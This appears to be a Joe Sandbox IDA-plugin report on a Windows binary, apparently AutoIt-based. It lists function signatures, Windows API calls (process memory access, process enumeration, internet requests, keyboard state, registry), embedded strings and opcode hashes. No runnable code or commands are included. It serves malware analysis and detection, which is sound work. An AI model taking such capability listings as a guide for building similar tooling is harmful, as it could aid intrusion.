                                                                                Similarity
                                                                                • API ID: LongMessageSendWindow
                                                                                • String ID:
                                                                                • API String ID: 3360111000-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 4170576061-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                • String ID:
                                                                                • API String ID: 161812096-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                • String ID:
                                                                                • API String ID: 395352322-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: AllocByteCharMultiStringWide
                                                                                • String ID:
                                                                                • API String ID: 3603722519-0
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                • String ID: Msctls_Progress32
                                                                                • API String ID: 1025951953-3636473452
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CreateHandlePipe
                                                                                • String ID: nul
                                                                                • API String ID: 1424370930-2873401336
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CreateHandlePipe
                                                                                • String ID: nul
                                                                                • API String ID: 1424370930-2873401336
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                • String ID:
                                                                                • API String ID: 3220332590-0
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: f$p
                                                                                • API String ID: 3215553584-1290815066
                                                                                Similarity
                                                                                • API ID: Variant$ClearCopy$AllocInitString
                                                                                • String ID:
                                                                                • API String ID: 3859894641-0
                                                                                Similarity
                                                                                • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 564229958-0
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %.15g$0x%p$False$True
                                                                                • API String ID: 0-2263619337
                                                                                Similarity
                                                                                • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                • String ID:
                                                                                • API String ID: 2592858361-0
                                                                                Similarity
                                                                                • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                                                • String ID:
                                                                                • API String ID: 383626216-0
                                                                                Similarity
                                                                                • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2082702847-0
                                                                                Similarity
                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                • String ID:
                                                                                • API String ID: 43455801-0
                                                                                Similarity
                                                                                • API ID: Virtual
                                                                                • String ID:
                                                                                • API String ID: 4278518827-0
                                                                                Similarity
                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 839392675-0
                                                                                Similarity
                                                                                • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                • String ID:
                                                                                • API String ID: 179993514-0
                                                                                • Opcode ID: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                                • Instruction ID: 0dca0da65c5c25ea928a8073896b83e735a0739b0709d01e60c3a1061827d7cb
                                                                                • Opcode Fuzzy Hash: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                                • Instruction Fuzzy Hash: D9F08121F1879143F764AB75BC48AF9A391BF88754FC54035D90E4AB58DF3CD0849B10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                                                • String ID: NULL Pointer assignment
                                                                                • API String ID: 1653399731-2785691316
                                                                                • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                • Instruction ID: 59a7c73bee8d17fa0aa01e81cdaf816037e8a1c1a0e0efb4e97eb47d3230cf58
                                                                                • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                • Instruction Fuzzy Hash: C4B19C32A04A818AEB60EF71D4405EDB7B0FB847A8F940135EE4D83B58DF38E595CB50
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF79F90BF47), ref: 00007FF79F90CE29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: BuffCharLower
                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                • API String ID: 2358735015-567219261
                                                                                • Opcode ID: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                                • Instruction ID: 452d63a8a626667da735da89ee8f87de877688649357d7db2253529daa766122
                                                                                • Opcode Fuzzy Hash: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                                • Instruction Fuzzy Hash: 3A91C323B1969385EA74AF3684405F9A3B0BF147A4BD84532DA1DE3788DF3DE952C320
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                • API String ID: 4237274167-1221869570
                                                                                • Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                • Instruction ID: 4902c9a8990dfee71a24115accf21bc1a241e6be5c8f129afa75f588aed0f7bb
                                                                                • Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                • Instruction Fuzzy Hash: 91918B26B08B8285EB60FF75D4406ECB3B5EB48BA8B894432DE4D87759DF38E455C360
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 00007FF79F8E0EDB
                                                                                  • Part of subcall function 00007FF79F8E0B90: CharUpperBuffW.USER32(?,?,00000001,00007FF79F8E0F61), ref: 00007FF79F8E0C6A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: BuffCharForegroundUpperWindow
                                                                                • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                                • API String ID: 3570115564-1994484594
                                                                                • Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                                • Instruction ID: 828dbedac1fdd1cda1153172e8c3029556c6c6901d822b8be3758a9a156c86dc
                                                                                • Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                                • Instruction Fuzzy Hash: 3C718E12A1DAC385EFB4BB71D801BF9E2A1AF54794FC44431CA0E86795EF3CE564A220
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                • API String ID: 3964851224-769500911
                                                                                • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                • Instruction ID: b62066bbc37ed968e1890766a51dcd1ece474365d50752a3ebcf55ea18304351
                                                                                • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                • Instruction Fuzzy Hash: 2D41FE22F1969340EAF07F358404AFDE2D16B24BD4BD40931CA5D83794EE7DE9529320
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: #$E$O
                                                                                • API String ID: 3215553584-248080428
                                                                                • Opcode ID: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                                • Instruction ID: 424aa5c0ce91812e147c1f6450962a6c93ebc245700eb688b20eab55d187a0b7
                                                                                • Opcode Fuzzy Hash: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                                • Instruction Fuzzy Hash: FE418222A1AB9585EFA1AF3198409E9A3B4FF54B88F884431EE4D07759DF3CD461E320
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                                • String ID: \*.*
                                                                                • API String ID: 3196045410-1173974218
                                                                                • Opcode ID: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                                • Instruction ID: 6b97ca7f76933d4873b417322eda43420660d3105db34aef9c111a43ec2ffe90
                                                                                • Opcode Fuzzy Hash: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                                • Instruction Fuzzy Hash: 7A412E22A0868395EBB0FB34D8416FDA764FF95788FC40031DA4D53AA9EF2CD659D710
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: MessageSend$ClassName
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 787153527-1403004172
                                                                                • Opcode ID: bcdae5920d2d928eb4967bcf07730aedcb02b36852307e6df1d0eb8a4287a533
                                                                                • Instruction ID: 6eaea6aa755425408fdde40be1505f258ae6adb11ea7cdaf093f26aa2b01650d
                                                                                • Opcode Fuzzy Hash: bcdae5920d2d928eb4967bcf07730aedcb02b36852307e6df1d0eb8a4287a533
                                                                                • Instruction Fuzzy Hash: 3E31F322A086C286EB70FB21E8409F9E360FF85B94FC54532DA5D47B95CE3CE555D720
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                • String ID:
                                                                                • API String ID: 3113390036-3916222277
                                                                                • Opcode ID: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                                • Instruction ID: a164d43316653ec23c0cb0d6ed59fbf9dd12922e925886cd4f25e1cd040fafbe
                                                                                • Opcode Fuzzy Hash: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                                • Instruction Fuzzy Hash: 9131C522A1C6C289E7B0AF32A416FEAA350FB94790F945131DF4D57B49DE3CD4229B90
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                • String ID: SysAnimate32
                                                                                • API String ID: 4146253029-1011021900
                                                                                • Opcode ID: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                                • Instruction ID: 5fc373760770b5580cc3ff93a2c34eaf3448b8b4d62a0b156afcf0d64be0b55a
                                                                                • Opcode Fuzzy Hash: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                                • Instruction Fuzzy Hash: 42314D32709BC1CAE770EF25A444BAAB7A0FB85BA0F944135DA5947B98DF3DD444CB10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                                • Instruction ID: e4eabc76b5331633b651bf0ac60584b985e386725f277ddf339f6670894b4055
                                                                                • Opcode Fuzzy Hash: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                                • Instruction Fuzzy Hash: E1F04421A19A8281EE64AB21E8846F9A3A0FF887A0FC51035E90F86758DF3CE494C710
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 3488606520-0
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                Similarity
                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 3740051246-0
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F90C2BF), ref: 00007FF79F90D176
                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F90C2BF), ref: 00007FF79F90D217
                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F90C2BF), ref: 00007FF79F90D236
                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F90C2BF), ref: 00007FF79F90D281
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F90C2BF), ref: 00007FF79F90D2A0
                                                                                  • Part of subcall function 00007FF79F894120: WideCharToMultiByte.KERNEL32 ref: 00007FF79F894160
                                                                                  • Part of subcall function 00007FF79F894120: WideCharToMultiByte.KERNEL32 ref: 00007FF79F89419C
                                                                                Similarity
                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                • String ID:
                                                                                • API String ID: 666041331-0
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                Similarity
                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                • String ID:
                                                                                • API String ID: 2832842796-0
                                                                                Similarity
                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                • String ID:
                                                                                • API String ID: 4210589936-0
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID:
                                                                                • API String ID: 190572456-0
                                                                                Similarity
                                                                                • API ID: Window$Show$Enable
                                                                                • String ID:
                                                                                • API String ID: 2939132127-0
                                                                                Similarity
                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                • String ID:
                                                                                • API String ID: 3382505437-0
                                                                                Similarity
                                                                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                • String ID:
                                                                                • API String ID: 2256411358-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                                • String ID:
                                                                                • API String ID: 2655805287-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                • String ID:
                                                                                • API String ID: 4156661090-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2067211477-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 3897988419-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 3741023627-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                • String ID:
                                                                                • API String ID: 2833360925-0
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,00007FF79F8D29AD,?,?,?,00007FF79F882AB2), ref: 00007FF79F8F003C
                                                                                • TerminateThread.KERNEL32(?,?,?,00007FF79F8D29AD,?,?,?,00007FF79F882AB2), ref: 00007FF79F8F0047
                                                                                • WaitForSingleObject.KERNEL32(?,?,?,00007FF79F8D29AD,?,?,?,00007FF79F882AB2), ref: 00007FF79F8F0055
                                                                                • ~SyncLockT.VCCORLIB ref: 00007FF79F8F005E
                                                                                  • Part of subcall function 00007FF79F8EF7B8: CloseHandle.KERNEL32(?,?,?,00007FF79F8F0063,?,?,?,00007FF79F8D29AD,?,?,?,00007FF79F882AB2), ref: 00007FF79F8EF7C9
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00007FF79F8D29AD,?,?,?,00007FF79F882AB2), ref: 00007FF79F8F006A
                                                                                Similarity
                                                                                • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3142591903-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: ErrorExitLastThread
                                                                                • String ID:
                                                                                • API String ID: 1611280651-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                • String ID:
                                                                                • API String ID: 179993514-0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstanceUninitialize
                                                                                • String ID: .lnk
                                                                                • API String ID: 948891078-24824748
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                • API String ID: 3215553584-1196891531
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: $*
                                                                                • API String ID: 3215553584-3982473090
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                • String ID: @
                                                                                • API String ID: 4150878124-2766056989
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                • String ID: U
                                                                                • API String ID: 2456169464-4171548499
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Window$Long
                                                                                • String ID: SysTreeView32
                                                                                • API String ID: 847901565-1698111956
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$CreateObjectStock
                                                                                • String ID: SysMonthCal32
                                                                                • API String ID: 2671490118-1439706946
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                                • String ID: msctls_updown32
                                                                                • API String ID: 1752125012-2298589950
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ErrorMode$InformationVolume
                                                                                • String ID: %lu
                                                                                • API String ID: 2507767853-685833217
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                • String ID: msctls_trackbar32
                                                                                • API String ID: 1025951953-1010561917
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                                • String ID: %s%d
                                                                                • API String ID: 2330185562-1110647743
                                                                                Similarity
                                                                                • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                • String ID: csm
                                                                                • API String ID: 2280078643-1018135373
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF79F8D2DD1), ref: 00007FF79F90AF37
                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF79F8D2DD1), ref: 00007FF79F90AF4F
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                • API String ID: 2574300362-1816364905
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                • API String ID: 2574300362-4033151799
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 2574300362-1355242751
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 2574300362-3689287502
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                • API String ID: 2574300362-192647395
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID:
                                                                                • API String ID: 1473721057-0
                                                                                Similarity
                                                                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 2000298826-0
                                                                                Similarity
                                                                                • API ID: Window$ClientMessageMoveRectScreenSend
                                                                                • String ID:
                                                                                • API String ID: 1249313431-0
                                                                                Similarity
                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 2267087916-0
                                                                                • Opcode ID: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                                • Instruction ID: 42198f170c2c2efef161ee8dd779bf307a40eaabc0d92103e1a578401bd2e808
                                                                                • Opcode Fuzzy Hash: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                                • Instruction Fuzzy Hash: 7F51A322B09A9185EFA0AF71D840AECB3B9BB44BA4F944135DE0D57798DF3CD952D310
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 3321077145-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 1352109105-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                • String ID:
                                                                                • API String ID: 3076010158-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                • String ID:
                                                                                • API String ID: 4141327611-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 1463438336-0
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF79F8AA27B,?,?,?,00007FF79F8AA236), ref: 00007FF79F8B3DB1
                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF79F8AA27B,?,?,?,00007FF79F8AA236), ref: 00007FF79F8B3E13
                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF79F8AA27B,?,?,?,00007FF79F8AA236), ref: 00007FF79F8B3E4D
                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF79F8AA27B,?,?,?,00007FF79F8AA236), ref: 00007FF79F8B3E77
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                • String ID:
                                                                                • API String ID: 1557788787-0
                                                                                APIs
